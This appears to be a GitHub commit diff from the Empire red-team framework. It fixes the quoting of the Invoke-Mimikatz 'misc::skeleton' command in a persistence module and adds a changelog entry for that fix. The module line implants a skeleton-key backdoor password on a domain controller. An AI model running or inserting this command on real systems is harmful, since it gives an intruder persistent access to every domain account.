File tree Expand file tree Collapse file tree 2 files changed +2
-1
lines changed
empire/server/modules/powershell/persistence/misc Expand file tree Collapse file tree 2 files changed +2
-1
lines changed Original file line number Diff line number Diff line change @@ -21,6 +21,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
2121### Fixed
2222
2323- Fixed stop-job handlers in PowerShell and Python agents crashing when the target job doesn't exist
24+ - Fixed misc_skeleton_key Invoke-Mimikatz call
2425
2526## [ 6.4.1] - 2026-02-15
2627- Fixed the ` docs/quickstart/installation/README.md ` file to specify a previously missing reference to Ubuntu
Original file line number Diff line number Diff line change @@ -40,5 +40,5 @@ options:
4040 required : true
4141 value : ' '
4242script_path : credentials/Invoke-Mimikatz.ps1
43- script_end : Invoke-Mimikatz -Command "' misc::skeleton'" ; 'Skeleton key implanted.
43+ script_end : Invoke-Mimikatz -Command '" misc::skeleton"' ; 'Skeleton key implanted.
4444 Use password mimikatz for access.'
You can’t perform that action at this time.
0 commit comments